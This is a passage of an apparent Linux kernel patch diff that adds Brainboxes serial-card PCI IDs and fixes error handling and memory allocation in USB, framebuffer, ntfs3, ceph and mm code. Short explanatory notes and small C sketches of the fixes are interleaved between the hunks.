++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{       PCI_VENDOR_ID_INTASHIELD, 0x08A2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	{       PCI_VENDOR_ID_INTASHIELD, 0x08A3,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+@@ -5021,6 +5215,10 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	/*
+ 	 * Brainboxes UC-346
+ 	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B01,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_4_115200 },
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x0B02,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+@@ -5032,6 +5230,10 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0A82,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x0A83,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+@@ -5044,12 +5246,94 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		0, 0,
+ 		pbn_b2_4_115200 },
+ 	/*
+-	 * Brainboxes UC-420/431
++	 * Brainboxes UC-420
+ 	 */
+ 	{       PCI_VENDOR_ID_INTASHIELD, 0x0921,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_4_115200 },
++	/*
++	 * Brainboxes UC-607
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x09A1,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x09A2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x09A3,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UC-836
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0D41,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_4_115200 },
++	/*
++	 * Brainboxes UP-189
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AC1,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AC2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AC3,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UP-200
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B21,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B22,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B23,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UP-869
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C01,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C02,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C03,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UP-880
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C21,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C22,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C23,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	/*
+ 	 * Brainboxes PX-101
+ 	 */
+@@ -5082,7 +5366,7 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x4015,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+-		pbn_oxsemi_4_15625000 },
++		pbn_oxsemi_2_15625000 },
+ 	/*
+ 	 * Brainboxes PX-260/PX-701
+ 	 */
+@@ -5090,6 +5374,13 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_oxsemi_4_15625000 },
++	/*
++	 * Brainboxes PX-275/279
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0E41,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_8_115200 },
+ 	/*
+ 	 * Brainboxes PX-310
+ 	 */
+@@ -5137,16 +5428,38 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		0, 0,
+ 		pbn_oxsemi_4_15625000 },
+ 	/*
+-	 * Brainboxes PX-803
++	 * Brainboxes PX-475
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x401D,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_1_15625000 },
++	/*
++	 * Brainboxes PX-803/PX-857
+ 	 */
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x4009,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+-		pbn_b0_1_115200 },
++		pbn_b0_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4018,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_2_15625000 },
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x401E,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+-		pbn_oxsemi_1_15625000 },
++		pbn_oxsemi_2_15625000 },
++	/*
++	 * Brainboxes PX-820
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4002,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b0_4_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4013,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_4_15625000 },
+ 	/*
+ 	 * Brainboxes PX-846
+ 	 */
+diff --git a/drivers/usb/gadget/legacy/raw_gadget.c b/drivers/usb/gadget/legacy/raw_gadget.c
+index e549022642e56..ea106ad665a1f 100644
+--- a/drivers/usb/gadget/legacy/raw_gadget.c
++++ b/drivers/usb/gadget/legacy/raw_gadget.c
+@@ -663,12 +663,12 @@ static int raw_process_ep0_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 	if (WARN_ON(in && dev->ep0_out_pending)) {
+ 		ret = -ENODEV;
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_unlock;
+ 	}
+ 	if (WARN_ON(!in && dev->ep0_in_pending)) {
+ 		ret = -ENODEV;
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_unlock;
+ 	}
+ 
+ 	dev->req->buf = data;
+@@ -683,7 +683,7 @@ static int raw_process_ep0_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 				"fail, usb_ep_queue returned %d\n", ret);
+ 		spin_lock_irqsave(&dev->lock, flags);
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_queue_failed;
+ 	}
+ 
+ 	ret = wait_for_completion_interruptible(&dev->ep0_done);
+@@ -692,13 +692,16 @@ static int raw_process_ep0_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 		usb_ep_dequeue(dev->gadget->ep0, dev->req);
+ 		wait_for_completion(&dev->ep0_done);
+ 		spin_lock_irqsave(&dev->lock, flags);
+-		goto out_done;
++		if (dev->ep0_status == -ECONNRESET)
++			dev->ep0_status = -EINTR;
++		goto out_interrupted;
+ 	}
+ 
+ 	spin_lock_irqsave(&dev->lock, flags);
+-	ret = dev->ep0_status;
+ 
+-out_done:
++out_interrupted:
++	ret = dev->ep0_status;
++out_queue_failed:
+ 	dev->ep0_urb_queued = false;
+ out_unlock:
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+@@ -1067,7 +1070,7 @@ static int raw_process_ep_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 				"fail, usb_ep_queue returned %d\n", ret);
+ 		spin_lock_irqsave(&dev->lock, flags);
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_queue_failed;
+ 	}
+ 
+ 	ret = wait_for_completion_interruptible(&done);
+@@ -1076,13 +1079,16 @@ static int raw_process_ep_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 		usb_ep_dequeue(ep->ep, ep->req);
+ 		wait_for_completion(&done);
+ 		spin_lock_irqsave(&dev->lock, flags);
+-		goto out_done;
++		if (ep->status == -ECONNRESET)
++			ep->status = -EINTR;
++		goto out_interrupted;
+ 	}
+ 
+ 	spin_lock_irqsave(&dev->lock, flags);
+-	ret = ep->status;
+ 
+-out_done:
++out_interrupted:
++	ret = ep->status;
++out_queue_failed:
+ 	ep->urb_queued = false;
+ out_unlock:
+ 	spin_unlock_irqrestore(&dev->lock, flags);
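
The raw_gadget hunks above split the old catch-all "out_done" label in two so that each failure path skips exactly the work that never happened: a failed usb_ep_queue() must not read ep0_status/ep->status (nothing ever set it), while an interrupted wait reads it only after mapping the -ECONNRESET from the forced dequeue back to -EINTR. A minimal standalone sketch of that label-ordering idiom; process_io() and its locals are illustrative stand-ins, not the driver's real helpers:

    #include <stdio.h>

    /* Hedged sketch of the staged-cleanup goto idiom: each failure jumps
     * to the label that runs only the teardown still needed. */
    static int process_io(int queue_fails, int interrupted)
    {
        int ret, status = 123;          /* stands in for ep->status */

        ret = queue_fails ? -19 : 0;    /* stands in for usb_ep_queue() */
        if (ret < 0)
            goto out_queue_failed;      /* status is not valid yet */

        if (interrupted) {
            status = -4;                /* -EINTR, as in the fix */
            goto out_interrupted;
        }

    out_interrupted:
        ret = status;                   /* read status only once it is meaningful */
    out_queue_failed:
        /* common teardown (urb_queued = false in the real driver) */
        return ret;
    }

    int main(void)
    {
        printf("%d %d %d\n", process_io(1, 0), process_io(0, 1),
               process_io(0, 0));
        return 0;
    }
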
+diff --git a/drivers/usb/storage/unusual_cypress.h b/drivers/usb/storage/unusual_cypress.h
+index 0547daf116a26..5df40759d77ad 100644
+--- a/drivers/usb/storage/unusual_cypress.h
++++ b/drivers/usb/storage/unusual_cypress.h
+@@ -19,7 +19,7 @@ UNUSUAL_DEV(  0x04b4, 0x6831, 0x0000, 0x9999,
+ 		"Cypress ISD-300LP",
+ 		USB_SC_CYP_ATACB, USB_PR_DEVICE, NULL, 0),
+ 
+-UNUSUAL_DEV( 0x14cd, 0x6116, 0x0160, 0x0160,
++UNUSUAL_DEV( 0x14cd, 0x6116, 0x0150, 0x0160,
+ 		"Super Top",
+ 		"USB 2.0  SATA BRIDGE",
+ 		USB_SC_CYP_ATACB, USB_PR_DEVICE, NULL, 0),
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index ad4d0314d27fa..5e9d0c695fdb7 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1616,6 +1616,9 @@ static int tcpm_pd_svdm(struct tcpm_port *port, struct typec_altmode *adev,
+ 			if (PD_VDO_VID(p[0]) != USB_SID_PD)
+ 				break;
+ 
++			if (IS_ERR_OR_NULL(port->partner))
++				break;
++
+ 			if (PD_VDO_SVDM_VER(p[0]) < svdm_version) {
+ 				typec_partner_set_svdm_version(port->partner,
+ 							       PD_VDO_SVDM_VER(p[0]));
+diff --git a/drivers/video/fbdev/aty/atyfb_base.c b/drivers/video/fbdev/aty/atyfb_base.c
+index b3463d1371520..faaa64fa5dfe9 100644
+--- a/drivers/video/fbdev/aty/atyfb_base.c
++++ b/drivers/video/fbdev/aty/atyfb_base.c
+@@ -3447,11 +3447,15 @@ static int atyfb_setup_generic(struct pci_dev *pdev, struct fb_info *info,
+ 	}
+ 
+ 	info->fix.mmio_start = raddr;
++#if defined(__i386__) || defined(__ia64__)
+ 	/*
+ 	 * By using strong UC we force the MTRR to never have an
+ 	 * effect on the MMIO region on both non-PAT and PAT systems.
+ 	 */
+ 	par->ati_regbase = ioremap_uc(info->fix.mmio_start, 0x1000);
++#else
++	par->ati_regbase = ioremap(info->fix.mmio_start, 0x1000);
++#endif
+ 	if (par->ati_regbase == NULL)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/video/fbdev/omap/omapfb_main.c b/drivers/video/fbdev/omap/omapfb_main.c
+index 17cda57656838..5ea7c52baa5a8 100644
+--- a/drivers/video/fbdev/omap/omapfb_main.c
++++ b/drivers/video/fbdev/omap/omapfb_main.c
+@@ -1643,13 +1643,13 @@ static int omapfb_do_probe(struct platform_device *pdev,
+ 	}
+ 	fbdev->int_irq = platform_get_irq(pdev, 0);
+ 	if (fbdev->int_irq < 0) {
+-		r = ENXIO;
++		r = -ENXIO;
+ 		goto cleanup;
+ 	}
+ 
+ 	fbdev->ext_irq = platform_get_irq(pdev, 1);
+ 	if (fbdev->ext_irq < 0) {
+-		r = ENXIO;
++		r = -ENXIO;
+ 		goto cleanup;
+ 	}
+ 
+diff --git a/drivers/video/fbdev/uvesafb.c b/drivers/video/fbdev/uvesafb.c
+index 0e3cabbec4b40..a85463db9f986 100644
+--- a/drivers/video/fbdev/uvesafb.c
++++ b/drivers/video/fbdev/uvesafb.c
+@@ -1935,10 +1935,10 @@ static void uvesafb_exit(void)
+ 		}
+ 	}
+ 
+-	cn_del_callback(&uvesafb_cn_id);
+ 	driver_remove_file(&uvesafb_driver.driver, &driver_attr_v86d);
+ 	platform_device_unregister(uvesafb_device);
+ 	platform_driver_unregister(&uvesafb_driver);
++	cn_del_callback(&uvesafb_cn_id);
+ }
+ 
+ module_exit(uvesafb_exit);
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index f6a7fd47efd7a..82874be945248 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -709,8 +709,8 @@ int ceph_wait_on_conflict_unlink(struct dentry *dentry)
+ 		if (!d_same_name(udentry, pdentry, &dname))
+ 			goto next;
+ 
++		found = dget_dlock(udentry);
+ 		spin_unlock(&udentry->d_lock);
+-		found = dget(udentry);
+ 		break;
+ next:
+ 		spin_unlock(&udentry->d_lock);
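
The ceph hunk above is a lifetime fix: the reference must be taken with ->d_lock still held (dget_dlock()) rather than after spin_unlock(), where another CPU could kill the dentry in the window between the two calls. A small userspace model of the rule "acquire the reference under the same lock that keeps the object alive"; this uses a plain mutex and counter, not the dcache API:

    #include <pthread.h>
    #include <stdio.h>

    struct obj {
        pthread_mutex_t lock;
        int refcount;
    };

    /* Safe order: bump the count while the lock is held, as dget_dlock()
     * does, then unlock. Unlocking first would reopen the race. */
    static void get_obj(struct obj *o)
    {
        pthread_mutex_lock(&o->lock);
        o->refcount++;
        pthread_mutex_unlock(&o->lock);
    }

    int main(void)
    {
        struct obj o = { PTHREAD_MUTEX_INITIALIZER, 1 };

        get_obj(&o);
        printf("refcount=%d\n", o.refcount);    /* 2 */
        return 0;
    }
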
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 63169529b52c4..2215179c925b3 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -1658,10 +1658,8 @@ repack:
+ 			le_b = NULL;
+ 			attr_b = ni_find_attr(ni, NULL, &le_b, ATTR_DATA, NULL,
+ 					      0, NULL, &mi_b);
+-			if (!attr_b) {
+-				err = -ENOENT;
+-				goto out;
+-			}
++			if (!attr_b)
++				return -ENOENT;
+ 
+ 			attr = attr_b;
+ 			le = le_b;
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index 81c22df27c725..0c6a68e71e7d4 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -52,7 +52,8 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 
+ 	if (!attr->non_res) {
+ 		lsize = le32_to_cpu(attr->res.data_size);
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
++		/* attr is resident: lsize < record_size (1K or 4K) */
++		le = kvmalloc(al_aligned(lsize), GFP_KERNEL);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+@@ -80,7 +81,17 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 		if (err < 0)
+ 			goto out;
+ 
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
++		/* attr is nonresident.
++		 * The worst case:
++		 * 1T (2^40) extremely fragmented file.
++		 * cluster = 4K (2^12) => 2^28 fragments
++		 * 2^9 fragments per one record => 2^19 records
++		 * 2^5 bytes of ATTR_LIST_ENTRY per one record => 2^24 bytes.
++		 *
++		 * the result is 16M bytes per attribute list.
++		 * Use kvmalloc to allocate in range [several Kbytes - dozen Mbytes]
++		 */
++		le = kvmalloc(al_aligned(lsize), GFP_KERNEL);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
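
The sizing comment added above can be checked mechanically. Using exactly the assumptions it states (a 1 TiB maximally fragmented file, 4 KiB clusters, 2^9 fragments per MFT record, 32-byte ATTR_LIST_ENTRY), the worst case lands at 16 MiB, which is why kvmalloc, able to fall back to vmalloc, replaces kmalloc here:

    #include <stdio.h>
    #include <stdint.h>

    int main(void)
    {
        uint64_t file_size  = 1ULL << 40;            /* 1 TiB */
        uint64_t cluster    = 1ULL << 12;            /* 4 KiB */
        uint64_t fragments  = file_size / cluster;   /* 2^28 */
        uint64_t records    = fragments >> 9;        /* 2^19 MFT records */
        uint64_t list_bytes = records << 5;          /* 32 bytes per entry */

        printf("worst-case attribute list: %llu MiB\n",
               (unsigned long long)(list_bytes >> 20));  /* prints 16 */
        return 0;
    }
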
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index e0cdc91d88a85..c055bbdfe0f7c 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -662,7 +662,8 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 		wnd->bits_last = wbits;
+ 
+ 	wnd->free_bits =
+-		kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
++		kvmalloc_array(wnd->nwnd, sizeof(u16), GFP_KERNEL | __GFP_ZERO);
++
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index fb438d6040409..d4d9f4ffb6d9a 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -309,7 +309,11 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 		return 0;
+ 	}
+ 
+-	dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
++	/* NTFS: symlinks are "dir + reparse" or "file + reparse" */
++	if (fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT)
++		dt_type = DT_LNK;
++	else
++		dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
+ 
+ 	return !dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
+ }
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index dda13e1f1b330..bb7e33c240737 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -2149,7 +2149,7 @@ out1:
+ 
+ 	for (i = 0; i < pages_per_frame; i++) {
+ 		pg = pages[i];
+-		if (i == idx)
++		if (i == idx || !pg)
+ 			continue;
+ 		unlock_page(pg);
+ 		put_page(pg);
+@@ -3198,6 +3198,12 @@ static bool ni_update_parent(struct ntfs_inode *ni, struct NTFS_DUP_INFO *dup,
+ 		if (!fname || !memcmp(&fname->dup, dup, sizeof(fname->dup)))
+ 			continue;
+ 
++		/* Check simple case when parent inode equals current inode. */
++		if (ino_get(&fname->home) == ni->vfs_inode.i_ino) {
++			ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
++			continue;
++		}
++
+ 		/* ntfs_iget5 may sleep. */
+ 		dir = ntfs_iget5(sb, &fname->home, NULL);
+ 		if (IS_ERR(dir)) {
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 00faf41d8f97d..710cb5aa5a65b 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2169,8 +2169,10 @@ file_is_valid:
+ 
+ 			if (!page) {
+ 				page = kmalloc(log->page_size, GFP_NOFS);
+-				if (!page)
+-					return -ENOMEM;
++				if (!page) {
++					err = -ENOMEM;
++					goto out;
++				}
+ 			}
+ 
+ 			/*
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 9c0fc3a29d0c9..873b1434a9989 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -953,18 +953,11 @@ out:
+ 	if (err)
+ 		return err;
+ 
+-	mark_inode_dirty(&ni->vfs_inode);
++	mark_inode_dirty_sync(&ni->vfs_inode);
+ 	/* verify(!ntfs_update_mftmirr()); */
+ 
+-	/*
+-	 * If we used wait=1, sync_inode_metadata waits for the io for the
+-	 * inode to finish. It hangs when media is removed.
+-	 * So wait=0 is sent down to sync_inode_metadata
+-	 * and filemap_fdatawrite is used for the data blocks.
+-	 */
+-	err = sync_inode_metadata(&ni->vfs_inode, 0);
+-	if (!err)
+-		err = filemap_fdatawrite(ni->vfs_inode.i_mapping);
++	/* write mft record on disk. */
++	err = _ni_write_inode(&ni->vfs_inode, 1);
+ 
+ 	return err;
+ }
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 8e2fe0f69203b..6066eea3f61cb 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -1141,7 +1141,7 @@ static int ntfs_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		goto put_inode_out;
+ 	}
+ 	bytes = inode->i_size;
+-	sbi->def_table = t = kmalloc(bytes, GFP_NOFS | __GFP_NOWARN);
++	sbi->def_table = t = kvmalloc(bytes, GFP_KERNEL);
+ 	if (!t) {
+ 		err = -ENOMEM;
+ 		goto put_inode_out;
+diff --git a/include/drm/gpu_scheduler.h b/include/drm/gpu_scheduler.h
+index 2ae4fd62e01c4..17e7e3145a058 100644
+--- a/include/drm/gpu_scheduler.h
++++ b/include/drm/gpu_scheduler.h
+@@ -55,8 +55,7 @@ enum drm_sched_priority {
+ 	DRM_SCHED_PRIORITY_HIGH,
+ 	DRM_SCHED_PRIORITY_KERNEL,
+ 
+-	DRM_SCHED_PRIORITY_COUNT,
+-	DRM_SCHED_PRIORITY_UNSET = -2
++	DRM_SCHED_PRIORITY_COUNT
+ };
+ 
+ /**
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 95f33dadb2be2..b76ff08506181 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -568,6 +568,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F3 0x14e3
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F3 0x14f3
+ #define PCI_DEVICE_ID_AMD_19H_M78H_DF_F3 0x12fb
++#define PCI_DEVICE_ID_AMD_VANGOGH_USB	0x163a
+ #define PCI_DEVICE_ID_AMD_CNB17H_F3	0x1703
+ #define PCI_DEVICE_ID_AMD_LANCE		0x2000
+ #define PCI_DEVICE_ID_AMD_LANCE_HOME	0x2001
+diff --git a/include/linux/power_supply.h b/include/linux/power_supply.h
+index aa2c4a7c4826d..a10428884e6a5 100644
+--- a/include/linux/power_supply.h
++++ b/include/linux/power_supply.h
+@@ -766,7 +766,7 @@ struct power_supply_battery_info {
+ 	int bti_resistance_tolerance;
+ };
+ 
+-extern struct atomic_notifier_head power_supply_notifier;
++extern struct blocking_notifier_head power_supply_notifier;
+ extern int power_supply_reg_notifier(struct notifier_block *nb);
+ extern void power_supply_unreg_notifier(struct notifier_block *nb);
+ #if IS_ENABLED(CONFIG_POWER_SUPPLY)
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index 0218fae12eddc..0133db648d8e9 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -326,7 +326,7 @@ static int kiocb_done(struct io_kiocb *req, ssize_t ret,
+ 	struct io_rw *rw = io_kiocb_to_cmd(req, struct io_rw);
+ 	unsigned final_ret = io_fixup_rw_res(req, ret);
+ 
+-	if (req->flags & REQ_F_CUR_POS)
++	if (ret >= 0 && req->flags & REQ_F_CUR_POS)
+ 		req->file->f_pos = rw->kiocb.ki_pos;
+ 	if (ret >= 0 && (rw->kiocb.ki_complete == io_complete_rw)) {
+ 		if (!__io_complete_rw_common(req, ret)) {
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index bfe2d1d50fbee..84e11c2caae42 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -1525,8 +1525,10 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		/*
+ 		 * Only update home node if there is an existing vma policy
+ 		 */
+-		if (!new)
++		if (!new) {
++			prev = vma;
+ 			continue;
++		}
+ 
+ 		/*
+ 		 * If any vma in the range got policy other than MPOL_BIND
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 8ffe3f87f7ba9..c0f9575493deb 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -519,6 +519,7 @@ inline int vma_expand(struct ma_state *mas, struct vm_area_struct *vma,
+ 	struct anon_vma *anon_vma = vma->anon_vma;
+ 	struct file *file = vma->vm_file;
+ 	bool remove_next = false;
++	struct vm_area_struct *anon_dup = NULL;
+ 
+ 	if (next && (vma != next) && (end == next->vm_end)) {
+ 		remove_next = true;
+@@ -530,6 +531,8 @@ inline int vma_expand(struct ma_state *mas, struct vm_area_struct *vma,
+ 			error = anon_vma_clone(vma, next);
+ 			if (error)
+ 				return error;
++
++			anon_dup = vma;
+ 		}
+ 	}
+ 
+@@ -602,6 +605,9 @@ inline int vma_expand(struct ma_state *mas, struct vm_area_struct *vma,
+ 	return 0;
+ 
+ nomem:
++	if (anon_dup)
++		unlink_anon_vmas(anon_dup);
++
+ 	return -ENOMEM;
+ }
+ 
+@@ -629,6 +635,7 @@ int __vma_adjust(struct vm_area_struct *vma, unsigned long start,
+ 	int remove_next = 0;
+ 	MA_STATE(mas, &mm->mm_mt, 0, 0);
+ 	struct vm_area_struct *exporter = NULL, *importer = NULL;
++	struct vm_area_struct *anon_dup = NULL;
+ 
+ 	if (next && !insert) {
+ 		if (end >= next->vm_end) {
+@@ -709,11 +716,17 @@ int __vma_adjust(struct vm_area_struct *vma, unsigned long start,
+ 			error = anon_vma_clone(importer, exporter);
+ 			if (error)
+ 				return error;
++
++			anon_dup = importer;
+ 		}
+ 	}
+ 
+-	if (mas_preallocate(&mas, vma, GFP_KERNEL))
++	if (mas_preallocate(&mas, vma, GFP_KERNEL)) {
++		if (anon_dup)
++			unlink_anon_vmas(anon_dup);
++
+ 		return -ENOMEM;
++	}
+ 
+ 	vma_adjust_trans_huge(orig_vma, start, end, adjust_next);
+ 	if (file) {
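
Both mmap hunks share one shape: anon_vma_clone() is a side effect that an error further down (mas_preallocate() failing) must now undo via unlink_anon_vmas(), or the cloned anon_vma chains leak. A hedged sketch of that record-then-unwind pattern; do_clone() and undo_clone() are hypothetical stand-ins, not the mm API:

    #include <stdio.h>

    static int  do_clone(void)   { return 0; }               /* succeeds */
    static void undo_clone(void) { puts("clone unwound"); }

    /* Remember which earlier step succeeded so a later failure can
     * undo it, mirroring the anon_dup bookkeeping in the hunks above. */
    static int expand(int prealloc_fails)
    {
        int cloned = 0;

        if (do_clone() != 0)
            return -1;
        cloned = 1;                  /* like anon_dup = vma */

        if (prealloc_fails) {        /* like mas_preallocate() failing */
            if (cloned)
                undo_clone();
            return -12;              /* -ENOMEM */
        }
        return 0;
    }

    int main(void)
    {
        printf("expand -> %d\n", expand(1));
        return 0;
    }
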
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 5e3dbe2652dbd..5c783199b4999 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7324,6 +7324,16 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
++static void audit_log_obj_reset(const struct nft_table *table,
++				unsigned int base_seq, unsigned int nentries)
++{
